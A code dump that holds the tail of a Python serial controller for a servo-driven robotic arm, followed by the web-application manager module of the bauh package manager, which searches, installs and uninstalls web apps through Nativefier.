def func1(self, event):
print("事件触发键盘输入:{0},对应的ASCII码:{1}".format(event.keysym, event.keycode))
if event.keysym == "Up":
self.angle0 = self.angle0 + 50
if self.angle0 > 2500:
self.angle0 = 2500
data = "#000P" + str(self.angle0) + "T0100!\n"
self.serial.write(data[0:-1].encode(self.encoding))
elif event.keysym == "Down":
self.angle0 = self.angle0 - 50
if self.angle0 < 500:
self.angle0 = 500
data = "#000P" + str(self.angle0) + "T0100!\n"
self.serial.write(data[0:-1].encode(self.encoding))
############################ 机械臂控制函数 ##################################
def restoration(self):
data = "$RST!\n"
self.serial.write(data[0:-1].encode(self.encoding))
time.sleep(0.1)
data = "$DST!\n"
self.serial.write(data[0:-1].encode(self.encoding))
def openhand(self):
data = "{#005P1700T0500!}\n"
self.serial.write(data[0:-1].encode(self.encoding))
time.sleep(0.5)
def closehand(self):
data = "{#005P1430T0800!}\n"
self.serial.write(data[0:-1].encode(self.encoding))
time.sleep(0.8)
def flipleft(self):
data = "{#004P0900T0500!}\n"
self.serial.write(data[0:-1].encode(self.encoding))
time.sleep(0.5)
def flipright(self):
data = "{#004P2100T0500!}\n"
self.serial.write(data[0:-1].encode(self.encoding))
time.sleep(0.5)
# 机械臂运动
def robotrun(self, offset, t=1000):
hasik, j1, j2, j3, j4 = four_dof_ik.inverse_kinematics(offset[0], offset[1], offset[2], 180)
if hasik:
self.sendmsg(agl0=1500 + int(j1 * 7.41), agl1=1500 - int(j2 * 7.41), agl2=1500 + int(j3 * 7.41),
agl3=1500 - int(j4 * 7.41), run_time=t)
return True
else:
return False
def working(self):
while (ifwork):
offset = get_coordinates("offset.txt")
time.sleep(0.2)
print("txt中坐标为:", offset)
if offset[0] != -1:
self.openhand()
if self.robotrun(offset):
self.closehand()
self.robotrun([0, -200, 130])
self.openhand()
self.robotrun([0, -1, 360])
write_coordinates("offset.txt", "-1,-1,-1")
# 串口发送指令到机械臂
def sendmsg(self, agl0=1500, agl1=1500, agl2=1550, agl3=1500, run_time=1000):
data = "{#000P" + str(agl0) + "T" + str(run_time) + "!" + \
"#001P" + str(agl1) + "T" + str(run_time) + "!" + \
"#002P" + str(agl2) + "T" + str(run_time) + "!" + \
"#003P" + str(agl3) + "T" + str(run_time) + "!" + "}\n"
self.serial.write(data.encode(self.encoding))
time.sleep(run_time / 1000.0)
if __name__ == '__main__':
assistant = SerialPortAssistant()
assistant.run()
|
controller.py
|
import glob
import locale
import os
import re
import shutil
import subprocess
import traceback
from math import floor
from pathlib import Path
from threading import Thread
from typing import List, Type, Set, Tuple
import requests
import yaml
from colorama import Fore
from requests import exceptions
from bauh.api.abstract.context import ApplicationContext
from bauh.api.abstract.controller import SoftwareManager, SearchResult
from bauh.api.abstract.disk import DiskCacheLoader
from bauh.api.abstract.handler import ProcessWatcher
from bauh.api.abstract.model import SoftwarePackage, PackageAction, PackageSuggestion, PackageUpdate, PackageHistory, \
SuggestionPriority, PackageStatus
from bauh.api.abstract.view import MessageType, MultipleSelectComponent, InputOption, SingleSelectComponent, \
SelectViewType, TextInputComponent, FormComponent, FileChooserComponent, ViewComponent, PanelComponent
from bauh.api.constants import DESKTOP_ENTRIES_DIR
from bauh.commons import resource, user
from bauh.commons.config import save_config
from bauh.commons.html import bold
from bauh.commons.system import ProcessHandler, get_dir_size, get_human_size_str
from bauh.gems.web import INSTALLED_PATH, nativefier, DESKTOP_ENTRY_PATH_PATTERN, URL_FIX_PATTERN, ENV_PATH, UA_CHROME, \
SEARCH_INDEX_FILE, SUGGESTIONS_CACHE_FILE, ROOT_DIR, CONFIG_FILE, TEMP_PATH
from bauh.gems.web.config import read_config
from bauh.gems.web.environment import EnvironmentUpdater, EnvironmentComponent
from bauh.gems.web.model import WebApplication
from bauh.gems.web.worker import SuggestionsDownloader, SearchIndexGenerator
try:
from bs4 import BeautifulSoup, SoupStrainer
BS4_AVAILABLE = True
except:
BS4_AVAILABLE = False
try:
import lxml
LXML_AVAILABLE = True
except:
LXML_AVAILABLE = False
RE_PROTOCOL_STRIP = re.compile(r'[a-zA-Z]+://')
RE_SEVERAL_SPACES = re.compile(r'\s+')
RE_SYMBOLS_SPLIT = re.compile(r'[\-|_\s:.]')
class WebApplicationManager(SoftwareManager):
def __init__(self, context: ApplicationContext, suggestions_downloader: Thread = None):
super(WebApplicationManager, self).__init__(context=context)
self.http_client = context.http_client
self.env_updater = EnvironmentUpdater(logger=context.logger, http_client=context.http_client,
file_downloader=context.file_downloader, i18n=context.i18n)
self.enabled = True
self.i18n = context.i18n
self.env_settings = {}
self.logger = context.logger
self.env_thread = None
self.suggestions_downloader = suggestions_downloader
self.suggestions = {}
def _get_lang_header(self) -> str:
try:
system_locale = locale.getdefaultlocale()
return system_locale[0] if system_locale else 'en_US'
except:
return 'en_US'
def _get_app_name(self, url_no_protocol: str, soup: "BeautifulSoup") -> str:
name_tag = soup.head.find('meta', attrs={'name': 'application-name'})
name = name_tag.get('content') if name_tag else None
if not name:
name_tag = soup.head.find('title')
name = name_tag.text.strip() if name_tag else None
if not name:
name = url_no_protocol.split('.')[0].strip()
if name:
name_split = [token for token in RE_SYMBOLS_SPLIT.split(name) if token]
if len(name_split) == 1:
name = name_split[0].strip()
else:
name = url_no_protocol
return name
def _get_app_icon_url(self, url: str, soup: "BeautifulSoup") -> str:
for rel in ('icon', 'ICON'):
icon_tag = soup.head.find('link', attrs={"rel": rel})
icon_url = icon_tag.get('href') if icon_tag else None
if icon_url and not icon_url.startswith('http'):
if icon_url.startswith('//'):
icon_url = 'https:{}'.format(icon_url)
elif icon_url.startswith('/'):
icon_url = url + icon_url
else:
icon_url = url + '/{}'.format(icon_url)
if icon_url:
return icon_url
if not icon_url:
icon_tag = soup.head.find('meta', attrs={"property": 'og:image'})
icon_url = icon_tag.get('content') if icon_tag else None
if icon_url:
return icon_url
def _get_app_description(self, url: str, soup: "BeautifulSoup") -> str:
description = None
desc_tag = soup.head.find('meta', attrs={'name': 'description'})
if desc_tag:
description = desc_tag.get('content')
if not description:
desc_tag = soup.find('title')
description = desc_tag.text if desc_tag else url
if description:
try:
utf8_desc = description.encode('iso-8859-1').decode('utf-8')
description = utf8_desc
except:
pass
return description
def _get_fix_for(self, url_no_protocol: str) -> str:
fix_url = URL_FIX_PATTERN.format(url=url_no_protocol)
try:
res = self.http_client.get(fix_url, session=False)
if res:
return res.text
except Exception as e:
self.logger.warning("Error when trying to retrieve a fix for {}: {}".format(fix_url, e.__class__.__name__))
def _strip_url_protocol(self, url: str) -> str:
return RE_PROTOCOL_STRIP.split(url)[1].strip().lower()
def serialize_to_disk(self, pkg: SoftwarePackage, icon_bytes: bytes, only_icon: bool):
super(WebApplicationManager, self).serialize_to_disk(pkg=pkg, icon_bytes=None, only_icon=False)
def _map_url(self, url: str) -> Tuple["BeautifulSoup", requests.Response]:
headers = {'Accept-language': self._get_lang_header(), 'User-Agent': UA_CHROME}
try:
url_res = self.http_client.get(url, headers=headers, ignore_ssl=True, single_call=True, session=False)
if url_res:
return BeautifulSoup(url_res.text, 'lxml', parse_only=SoupStrainer('head')), url_res
except exceptions.ConnectionError as e:
self.logger.warning("Could not get {}: {}".format(url, e.__class__.__name__))
def search(self, words: str, disk_loader: DiskCacheLoader, limit: int = -1, is_url: bool = False) -> SearchResult:
local_config = {}
thread_config = Thread(target=self._fill_config_async, args=(local_config,))
thread_config.start()
res = SearchResult([], [], 0)
installed = self.read_installed(disk_loader=disk_loader, limit=limit).installed
if is_url:
url = words[0:-1] if words.endswith('/') else words
url_no_protocol = self._strip_url_protocol(url)
installed_matches = [app for app in installed if self._strip_url_protocol(app.url) == url_no_protocol]
if installed_matches:
res.installed.extend(installed_matches)
else:
soup_map = self._map_url(url)
if soup_map:
soup, response = soup_map[0], soup_map[1]
final_url = response.url
if final_url.endswith('/'):
final_url = final_url[0:-1]
name = self._get_app_name(url_no_protocol, soup)
desc = self._get_app_description(final_url, soup)
icon_url = self._get_app_icon_url(final_url, soup)
app = WebApplication(url=final_url, name=name, description=desc, icon_url=icon_url)
if self.env_settings.get('electron') and self.env_settings['electron'].get('version'):
app.version = self.env_settings['electron']['version']
app.latest_version = app.version
res.new = [app]
else:
lower_words = words.lower().strip()
installed_matches = [app for app in installed if lower_words in app.name.lower()]
index = self._read_search_index()
if index:
split_words = lower_words.split(' ')
singleword = ''.join(lower_words)
query_list = [*split_words, singleword]
index_match_keys = set()
for key in index:
for query in query_list:
if query in key:
index_match_keys.update(index[key])
if not index_match_keys:
self.logger.info("Query '{}' was not found in the suggestion's index".format(words))
res.installed.extend(installed_matches)
else:
if not os.path.exists(SUGGESTIONS_CACHE_FILE):
# if the suggestions cache was not found, it will not be possible to retrieve the matched apps
# so only the installed matches will be returned
self.logger.warning("Suggestion cached file {} was not found".format(SUGGESTIONS_CACHE_FILE))
res.installed.extend(installed_matches)
else:
with open(SUGGESTIONS_CACHE_FILE) as f:
cached_suggestions = yaml.safe_load(f.read())
if not cached_suggestions:
# if no suggestion is found, it will not be possible to retrieve the matched apps
# so only the installed matches will be returned
self.logger.warning("No suggestion found in {}".format(SUGGESTIONS_CACHE_FILE))
res.installed.extend(installed_matches)
else:
matched_suggestions = [cached_suggestions[key] for key in index_match_keys if cached_suggestions.get(key)]
if not matched_suggestions:
self.logger.warning("No suggestion found for the search index keys: {}".format(index_match_keys))
res.installed.extend(installed_matches)
else:
matched_suggestions.sort(key=lambda s: s.get('priority', 0), reverse=True)
if installed_matches:
# checking if any of the installed matches is one of the matched suggestions
for sug in matched_suggestions:
found = [i for i in installed_matches if i.url == sug.get('url')]
if found:
res.installed.extend(found)
else:
res.new.append(self._map_suggestion(sug).package)
else:
for sug in matched_suggestions:
res.new.append(self._map_suggestion(sug).package)
res.total += len(res.installed)
res.total += len(res.new)
if res.new:
thread_config.join()
if local_config['environment']['electron']['version']:
for app in res.new:
app.version = str(local_config['environment']['electron']['version'])
app.latest_version = app.version
return res
def _read_search_index(self) -> dict:
if os.path.exists(SEARCH_INDEX_FILE):
with open(SEARCH_INDEX_FILE) as f:
return yaml.safe_load(f.read())
else:
self.logger.warning("No search index found at {}".format(SEARCH_INDEX_FILE))
def read_installed(self, disk_loader: DiskCacheLoader, limit: int = -1, only_apps: bool = False, pkg_types: Set[Type[SoftwarePackage]] = None, internet_available: bool = True) -> SearchResult:
res = SearchResult([], [], 0)
if os.path.exists(INSTALLED_PATH):
for data_path in glob.glob('{}/*/*data.yml'.format(INSTALLED_PATH)):
with open(data_path, 'r') as f:
res.installed.append(WebApplication(installed=True, **yaml.safe_load(f.read())))
res.total += 1
return res
def downgrade(self, pkg: SoftwarePackage, root_password: str, handler: ProcessWatcher) -> bool:
pass
def update(self, pkg: SoftwarePackage, root_password: str, watcher: ProcessWatcher) -> bool:
pass
def uninstall(self, pkg: WebApplication, root_password: str, watcher: ProcessWatcher) -> bool:
self.logger.info("Checking if {} installation directory {} exists".format(pkg.name, pkg.installation_dir))
if not os.path.exists(pkg.installation_dir):
watcher.show_message(title=self.i18n['error'],
body=self.i18n['web.uninstall.error.install_dir.not_found'].format(bold(pkg.installation_dir)),
type_=MessageType.ERROR)
return False
self.logger.info("Removing {} installation directory {}".format(pkg.name, pkg.installation_dir))
try:
shutil.rmtree(pkg.installation_dir)
except:
watcher.show_message(title=self.i18n['error'],
body=self.i18n['web.uninstall.error.remove'].format(bold(pkg.installation_dir)),
type_=MessageType.ERROR)
traceback.print_exc()
return False
self.logger.info("Checking if {} desktop entry file {} exists".format(pkg.name, pkg.desktop_entry))
if os.path.exists(pkg.desktop_entry):
try:
os.remove(pkg.desktop_entry)
except:
watcher.show_message(title=self.i18n['error'],
body=self.i18n['web.uninstall.error.remove'].format(bold(pkg.desktop_entry)),
type_=MessageType.ERROR)
traceback.print_exc()
autostart_path = pkg.get_autostart_path()
if os.path.exists(autostart_path):
try:
os.remove(autostart_path)
except:
watcher.show_message(title=self.i18n['error'],
body=self.i18n['web.uninstall.error.remove'].format(bold(autostart_path)),
type_=MessageType.WARNING)
traceback.print_exc()
config_path = pkg.get_config_dir()
if config_path and os.path.exists(config_path):
try:
shutil.rmtree(config_path)
except:
watcher.show_message(title=self.i18n['error'],
body=self.i18n['web.uninstall.error.remove'].format(bold(config_path)),
type_=MessageType.WARNING)
traceback.print_exc()
return True
def get_managed_types(self) -> Set[Type[SoftwarePackage]]:
return {WebApplication}
def get_info(self, pkg: WebApplication) -> dict:
if pkg.installed:
info = {'0{}_{}'.format(idx + 1, att): getattr(pkg, att) for idx, att in enumerate(('url', 'description', 'version', 'categories', 'installation_dir', 'desktop_entry'))}
info['07_exec_file'] = pkg.get_exec_path()
info['08_icon_path'] = pkg.get_disk_icon_path()
if os.path.exists(pkg.installation_dir):
info['09_size'] = get_human_size_str(get_dir_size(pkg.installation_dir))
config_dir = pkg.get_config_dir()
if config_dir:
info['10_config_dir'] = config_dir
if info.get('04_categories'):
info['04_categories'] = [self.i18n[c.lower()].capitalize() for c in info['04_categories']]
return info
else:
return {'0{}_{}'.format(idx + 1, att): getattr(pkg, att) for idx, att in enumerate(('url', 'description', 'version', 'categories'))}
def get_history(self, pkg: SoftwarePackage) -> PackageHistory:
pass
def _ask_install_options(self, app: WebApplication, watcher: ProcessWatcher) -> Tuple[bool, List[str]]:
watcher.change_substatus(self.i18n['web.install.substatus.options'])
inp_url = TextInputComponent(label=self.i18n['address'], value=app.url, read_only=True)
inp_name = TextInputComponent(label=self.i18n['name'], value=app.name)
inp_desc = TextInputComponent(label=self.i18n['description'], value=app.description)
cat_ops = [InputOption(label=self.i18n['web.install.option.category.none'].capitalize(), value=0)]
cat_ops.extend([InputOption(label=self.i18n[c.lower()].capitalize(), value=c) for c in self.context.default_categories])
def_cat = cat_ops[0]
if app.categories:
for opt in cat_ops:
if opt.value == app.categories[0]:
def_cat = opt
break
inp_cat = SingleSelectComponent(label=self.i18n['category'], type_=SelectViewType.COMBO, options=cat_ops, default_option=def_cat)
tray_op_off = InputOption(id_='tray_off', label=self.i18n['web.install.option.tray.off.label'], value=0, tooltip=self.i18n['web.install.option.tray.off.tip'])
tray_op_default = InputOption(id_='tray_def', label=self.i18n['web.install.option.tray.default.label'], value='--tray', tooltip=self.i18n['web.install.option.tray.default.tip'])
tray_op_min = InputOption(id_='tray_min', label=self.i18n['web.install.option.tray.min.label'], value='--tray=start-in-tray', tooltip=self.i18n['web.install.option.tray.min.tip'])
tray_opts = [tray_op_off, tray_op_default, tray_op_min]
def_tray_opt = None
if app.preset_options:
for opt in tray_opts:
if opt.id in app.preset_options:
def_tray_opt = opt
break
inp_tray = SingleSelectComponent(type_=SelectViewType.COMBO,
options=tray_opts,
default_option=def_tray_opt,
label=self.i18n['web.install.option.tray.label'])
icon_op_ded = InputOption(id_='icon_ded', label=self.i18n['web.install.option.wicon.deducted.label'], value=0,
tooltip=self.i18n['web.install.option.wicon.deducted.tip'].format('Nativefier'))
icon_op_disp = InputOption(id_='icon_disp', label=self.i18n['web.install.option.wicon.displayed.label'],
value=1, tooltip=self.i18n['web.install.option.wicon.displayed.tip'])
inp_icon = SingleSelectComponent(type_=SelectViewType.COMBO,
options=[icon_op_disp, icon_op_ded],
default_option=icon_op_disp if app.icon_url and app.save_icon else icon_op_ded,
label=self.i18n['web.install.option.wicon.label'])
icon_chooser = FileChooserComponent(allowed_extensions={'png', 'svg', 'ico', 'jpg', 'jpeg'}, label=self.i18n['web.install.option.icon.label'])
form_1 = FormComponent(components=[inp_url, inp_name, inp_desc, inp_cat, inp_icon, icon_chooser, inp_tray], label=self.i18n['web.install.options.basic'].capitalize())
op_single = InputOption(id_='single', label=self.i18n['web.install.option.single.label'], value="--single-instance", tooltip=self.i18n['web.install.option.single.tip'])
op_max = InputOption(id_='max', label=self.i18n['web.install.option.max.label'], value="--maximize", tooltip=self.i18n['web.install.option.max.tip'])
op_fs = InputOption(id_='fullscreen', label=self.i18n['web.install.option.fullscreen.label'], value="--full-screen", tooltip=self.i18n['web.install.option.fullscreen.tip'])
op_nframe = InputOption(id_='no_frame', label=self.i18n['web.install.option.noframe.label'], value="--hide-window-frame", tooltip=self.i18n['web.install.option.noframe.tip'])
op_allow_urls = InputOption(id_='allow_urls', label=self.i18n['web.install.option.allow_urls.label'], value='--internal-urls=.*', tooltip=self.i18n['web.install.option.allow_urls.tip'])
op_ncache = InputOption(id_='no_cache', label=self.i18n['web.install.option.nocache.label'], value="--clear-cache", tooltip=self.i18n['web.install.option.nocache.tip'])
op_insecure = InputOption(id_='insecure', label=self.i18n['web.install.option.insecure.label'], value="--insecure", tooltip=self.i18n['web.install.option.insecure.tip'])
op_igcert = InputOption(id_='ignore_certs', label=self.i18n['web.install.option.ignore_certificate.label'], value="--ignore-certificate", tooltip=self.i18n['web.install.option.ignore_certificate.tip'])
adv_opts = [op_single, op_allow_urls, op_max, op_fs, op_nframe, op_ncache, op_insecure, op_igcert]
def_adv_opts = {op_single, op_allow_urls}
if app.preset_options:
for opt in adv_opts:
if opt.id in app.preset_options:
def_adv_opts.add(opt)
check_options = MultipleSelectComponent(options=adv_opts, default_options=def_adv_opts, label=self.i18n['web.install.options.advanced'].capitalize())
res = watcher.request_confirmation(title=self.i18n['web.install.options_dialog.title'],
body=None,
components=[form_1, check_options],
confirmation_label=self.i18n['continue'].capitalize(),
deny_label=self.i18n['cancel'].capitalize())
if res:
selected = []
if check_options.values:
selected.extend(check_options.get_selected_values())
tray_mode = inp_tray.get_selected()
if tray_mode is not None and tray_mode != 0:
selected.append(tray_mode)
custom_name = inp_name.get_value()
if custom_name:
app.name = custom_name
custom_desc = inp_desc.get_value()
if custom_desc:
app.description = inp_desc.get_value()
cat = inp_cat.get_selected()
if cat != 0:
app.categories = [cat]
if icon_chooser.file_path:
app.set_custom_icon(icon_chooser.file_path)
selected.append('--icon={}'.format(icon_chooser.file_path))
app.save_icon = inp_icon.value == icon_op_disp
return res, selected
return False, []
def _gen_app_id(self, name: str) -> Tuple[str, str]:
treated_name = RE_SYMBOLS_SPLIT.sub('-', name.lower().strip())
config_path = '{}/.config'.format(Path.home())
counter = 0
while True:
app_id = '{}{}'.format(treated_name, '-{}'.format(counter) if counter else '')
if not os.path.exists('{}/{}'.format(INSTALLED_PATH, app_id)):
# checking if there is no config folder associated with the id
if os.path.exists(config_path):
if not glob.glob('{}/{}-nativefier-*'.format(config_path, app_id)):
return app_id, treated_name
counter += 1
def _gen_desktop_entry_path(self, app_id: str) -> str:
base_id = app_id
counter = 1
while True:
desk_path = DESKTOP_ENTRY_PATH_PATTERN.format(name=base_id)
if not os.path.exists(desk_path):
return desk_path
else:
base_id = '{}_{}'.format(app_id, counter)
counter += 1
def _ask_update_permission(self, to_update: List[EnvironmentComponent], watcher: ProcessWatcher) -> bool:
icon = resource.get_path('img/web.png', ROOT_DIR)
opts = [InputOption(label='{} ( {} )'.format(f.name, f.size or '?'),
tooltip=f.url, icon_path=icon, read_only=True, value=f.name) for f in to_update]
comps = MultipleSelectComponent(label=None, options=opts, default_options=set(opts))
return watcher.request_confirmation(title=self.i18n['web.install.env_update.title'],
body=self.i18n['web.install.env_update.body'],
components=[comps],
confirmation_label=self.i18n['continue'].capitalize(),
deny_label=self.i18n['cancel'].capitalize())
def _download_suggestion_icon(self, pkg: WebApplication, app_dir: str) -> Tuple[str, bytes]:
try:
if self.http_client.exists(pkg.icon_url, session=False):
icon_path = '{}/{}'.format(app_dir, pkg.icon_url.split('/')[-1])
try:
res = self.http_client.get(pkg.icon_url, session=False)
if not res:
self.logger.info('Could not download the icon {}'.format(pkg.icon_url))
else:
return icon_path, res.content
except:
self.logger.error("An exception has happened when downloading {}".format(pkg.icon_url))
traceback.print_exc()
else:
self.logger.warning('Could no retrieve the icon {} defined for the suggestion {}'.format(pkg.icon_url, pkg.name))
except:
self.logger.warning('An exception happened when trying to retrieve the icon {} for the suggestion {}'.format(pkg.icon_url,
pkg.name))
traceback.print_exc()
def install(self, pkg: WebApplication, root_password: str, watcher: ProcessWatcher) -> bool:
continue_install, install_options = self._ask_install_options(pkg, watcher)
if not continue_install:
watcher.print("Installation aborted by the user")
return False
watcher.change_substatus(self.i18n['web.env.checking'])
handler = ProcessHandler(watcher)
env_settings = self.env_updater.read_settings()
local_config = read_config()
if local_config['environment']['system'] and not nativefier.is_available():
watcher.show_message(title=self.i18n['error'].capitalize(),
body=self.i18n['web.install.global_nativefier.unavailable'].format(n=bold('Nativefier'), app=bold(pkg.name)) + '.',
type_=MessageType.ERROR)
return False
env_components = self.env_updater.check_environment(app=pkg, local_config=local_config, env=env_settings, is_x86_x64_arch=self.context.is_system_x86_64())
comps_to_update = [c for c in env_components if c.update]
if comps_to_update and not self._ask_update_permission(comps_to_update, watcher):
return False
if not self.env_updater.update(components=comps_to_update, handler=handler):
watcher.show_message(title=self.i18n['error'], body=self.i18n['web.env.error'].format(bold(pkg.name)), type_=MessageType.ERROR)
return False
Path(INSTALLED_PATH).mkdir(parents=True, exist_ok=True)
app_id, treated_name = self._gen_app_id(pkg.name)
pkg.id = app_id
app_dir = '{}/{}'.format(INSTALLED_PATH, app_id)
watcher.change_substatus(self.i18n['web.install.substatus.checking_fixes'])
fix = self._get_fix_for(url_no_protocol=self._strip_url_protocol(pkg.url))
fix_path = '{}/fix.js'.format(app_dir)
if fix:
# just adding the fix as an installation option. The file will be written later
self.logger.info('Fix found for {}'.format(pkg.url))
watcher.print('Fix found for {}'.format(pkg.url))
install_options.append('--inject={}'.format(fix_path))
# if a custom icon is defined for an app suggestion:
icon_path, icon_bytes = None, None
if pkg.icon_url and pkg.save_icon and not {o for o in install_options if o.startswith('--icon')}:
download = self._download_suggestion_icon(pkg, app_dir)
if download and download[1]:
icon_path, icon_bytes = download[0], download[1]
pkg.custom_icon = icon_path
# writting the icon in a temporary folder to be used by the nativefier process
temp_icon_path = '{}/{}'.format(TEMP_PATH, pkg.icon_url.split('/')[-1])
install_options.append('--icon={}'.format(temp_icon_path))
self.logger.info("Writing a temp suggestion icon at {}".format(temp_icon_path))
with open(temp_icon_path, 'wb+') as f:
f.write(icon_bytes)
watcher.change_substatus(self.i18n['web.install.substatus.call_nativefier'].format(bold('nativefier')))
electron_version = str(next((c for c in env_components if c.id == 'electron')).version)
installed = handler.handle_simple(nativefier.install(url=pkg.url, name=app_id, output_dir=app_dir,
electron_version=electron_version,
system=bool(local_config['environment']['system']),
cwd=INSTALLED_PATH,
extra_options=install_options))
if not installed:
msg = '{}.{}.'.format(self.i18n['wen.install.error'].format(bold(pkg.name)),
self.i18n['web.install.nativefier.error.unknown'].format(bold(self.i18n['details'].capitalize())))
watcher.show_message(title=self.i18n['error'], body=msg, type_=MessageType.ERROR)
return False
inner_dir = os.listdir(app_dir)
if not inner_dir:
msg = '{}.{}.'.format(self.i18n['wen.install.error'].format(bold(pkg.name)),
self.i18n['web.install.nativefier.error.inner_dir'].format(bold(app_dir)))
watcher.show_message(title=self.i18n['error'], body=msg, type_=MessageType.ERROR)
return False
# bringing the inner app folder to the 'installed' folder level:
inner_dir = '{}/{}'.format(app_dir, inner_dir[0])
temp_dir = '{}/tmp_{}'.format(INSTALLED_PATH, treated_name)
os.rename(inner_dir, temp_dir)
shutil.rmtree(app_dir)
os.rename(temp_dir, app_dir)
# injecting a fix
if fix:
self.logger.info('Writting JS fix at {}'.format(fix_path))
with open(fix_path, 'w+') as f:
f.write(fix)
# persisting the custom suggestion icon in the defitive directory
if icon_bytes:
self.logger.info("Writting the final custom suggestion icon at {}".format(icon_path))
with open(icon_path, 'wb+') as f:
f.write(icon_bytes)
pkg.installation_dir = app_dir
version_path = '{}/version'.format(app_dir)
if os.path.exists(version_path):
with open(version_path, 'r') as f:
pkg.version = f.read().strip()
pkg.latest_version = pkg.version
watcher.change_substatus(self.i18n['web.install.substatus.shortcut'])
desktop_entry_path = self._gen_desktop_entry_path(app_id)
entry_content = self._gen_desktop_entry_content(pkg)
Path(DESKTOP_ENTRIES_DIR).mkdir(parents=True, exist_ok=True)
with open(desktop_entry_path, 'w+') as f:
f.write(entry_content)
pkg.desktop_entry = desktop_entry_path
if '--tray=start-in-tray' in install_options:
autostart_dir = '{}/.config/autostart'.format(Path.home())
Path(autostart_dir).mkdir(parents=True, exist_ok=True)
with open(pkg.get_autostart_path(), 'w+') as f:
f.write(entry_content)
if install_options:
pkg.options_set = install_options
return True
def _gen_desktop_entry_content(self, pkg: WebApplication) -> str:
return """
[Desktop Entry]
Type=Application
Name={name} ( web )
Comment={desc}
Icon={icon}
Exec={exec_path}
{categories}
""".format(name=pkg.name, exec_path=pkg.get_command(),
desc=pkg.description or pkg.url, icon=pkg.get_disk_icon_path(),
categories='Categories={}'.format(';'.join(pkg.categories)) if pkg.categories else '')
def is_enabled(self) -> bool:
return self.enabled
def set_enabled(self, enabled: bool):
self.enabled = enabled
def can_work(self) -> bool:
if BS4_AVAILABLE and LXML_AVAILABLE:
config = read_config(update_file=True)
use_system_env = config['environment']['system']
if not use_system_env:
return True
return nativefier.is_available()
return False
def requires_root(self, action: str, pkg: SoftwarePackage):
return False
def _update_env_settings(self):
self.env_settings = self.env_updater.read_settings()
def _download_suggestions(self):
downloader = SuggestionsDownloader(logger=self.logger, http_client=self.http_client)
self.suggestions = downloader.download()
if self.suggestions:
index_gen = SearchIndexGenerator(logger=self.logger)
Thread(target=index_gen.generate_index, args=(self.suggestions,), daemon=True).start()
def prepare(self):
self.env_thread = Thread(target=self._update_env_settings, daemon=True)
self.env_thread.start()
self.suggestions_downloader = Thread(target=self._download_suggestions, daemon=True)
self.suggestions_downloader.start()
def list_updates(self, internet_available: bool) -> List[PackageUpdate]:
pass
def list_warnings(self, internet_available: bool) -> List[str]:
pass
def _fill_suggestion(self, app: WebApplication):
soup_map = self._map_url(app.url)
if soup_map:
soup, res = soup_map[0], soup_map[1]
app.url = res.url
if app.url.endswith('/'):
app.url = app.url[0:-1]
if not app.name:
app.name = self._get_app_name(app.url, soup)
if not app.description:
app.description = self._get_app_description(app.url, soup)
find_url = not app.icon_url or (app.icon_url and not self.http_client.exists(app.icon_url, session=False))
if find_url:
app.icon_url = self._get_app_icon_url(app.url, soup)
app.status = PackageStatus.READY
def _map_suggestion(self, suggestion: dict) -> PackageSuggestion:
app = WebApplication(name=suggestion.get('name'),
url=suggestion.get('url'),
icon_url=suggestion.get('icon_url'),
categories=[suggestion['category']] if suggestion.get('category') else None,
preset_options=suggestion.get('options'),
save_icon=suggestion.get('save_icon', False))
app.set_version(suggestion.get('version'))
description = suggestion.get('description')
if isinstance(description, dict):
app.description = description.get(self.i18n.current_key, description.get(self.i18n.default_key))
elif isinstance(description, str):
app.description = description
if not app.version and self.env_settings and self.env_settings.get('electron'):
app.version = self.env_settings['electron']['version']
app.latest_version = app.version
app.status = PackageStatus.LOADING_DATA
Thread(target=self._fill_suggestion, args=(app,), daemon=True).start()
return PackageSuggestion(priority=SuggestionPriority(suggestion['priority']), package=app)
def _fill_config_async(self, output: dict):
output.update(read_config())
def list_suggestions(self, limit: int, filter_installed: bool) -> List[PackageSuggestion]:
local_config = {}
thread_config = Thread(target=self._fill_config_async, args=(local_config,))
thread_config.start()
if self.suggestions:
suggestions = self.suggestions
elif self.suggestions_downloader:
self.suggestions_downloader.join(5)
suggestions = self.suggestions
else:
suggestions = SuggestionsDownloader(logger=self.logger, http_client=self.http_client).download()
# cleaning memory
self.suggestions_downloader = None
self.suggestions = None
if suggestions:
suggestion_list = list(suggestions.values())
suggestion_list.sort(key=lambda s: s.get('priority', 0), reverse=True)
if filter_installed:
installed = {self._strip_url_protocol(i.url) for i in self.read_installed(disk_loader=None).installed}
else:
installed = None
res = []
for s in suggestion_list:
if limit <= 0 or len(res) < limit:
if installed:
surl = self._strip_url_protocol(s['url'])
if surl in installed:
continue
res.append(self._map_suggestion(s))
else:
break
if res:
if not self.env_settings and self.env_thread:
self.env_thread.join()
self.env_thread = None # cleaning memory
if self.env_settings:
for s in res:
s.package.version = self.env_settings['electron']['version']
s.package.latest_version = s.package.version
thread_config.join()
if local_config and local_config['environment']['electron']['version']:
for s in res:
s.package.version = str(local_config['environment']['electron']['version'])
s.package.latest_version = s.package.version
return res
def execute_custom_action(self, action: PackageAction, pkg: SoftwarePackage, root_password: str, watcher: ProcessWatcher) -> bool:
pass
def is_default_enabled(self) -> bool:
return True
def launch(self, pkg: WebApplication):
subprocess.Popen(pkg.get_command(), shell=user.is_root())
def get_screenshots(self, pkg: SoftwarePackage) -> List[str]:
pass
def clear_data(self):
if os.path.exists(ENV_PATH):
print('[bauh][web] Deleting directory {}'.format(ENV_PATH))
try:
shutil.rmtree(ENV_PATH)
print('{}[bauh][web] Directory {} deleted{}'.format(Fore.YELLOW, ENV_PATH, Fore.RESET))
except:
print('{}[bauh][web] An exception has happened when deleting {}{}'.format(Fore.RED, ENV_PATH, Fore.RESET))
traceback.print_exc()
def get_settings(self, screen_width: int, screen_height: int) -> ViewComponent:
config = read_config()
max_width = floor(screen_width * 0.15)
input_electron = TextInputComponent(label=self.i18n['web.settings.electron.version.label'],
value=config['environment']['electron']['version'],
tooltip=self.i18n['web.settings.electron.version.tooltip'],
placeholder='{}: 7.1.0'.format(self.i18n['example.short']),
max_width=max_width,
id_='electron_version')
native_opts = [
InputOption(label=self.i18n['web.settings.nativefier.env'].capitalize(), value=False, tooltip=self.i18n['web.settings.nativefier.env.tooltip'].format(app=self.context.app_name)),
InputOption(label=self.i18n['web.settings.nativefier.system'].capitalize(), value=True, tooltip=self.i18n['web.settings.nativefier.system.tooltip'])
]
select_nativefier = SingleSelectComponent(label="Nativefier",
options=native_opts,
default_option=[o for o in native_opts if o.value == config['environment']['system']][0],
type_=SelectViewType.COMBO,
tooltip=self.i18n['web.settings.nativefier.tip'],
max_width=max_width,
id_='nativefier')
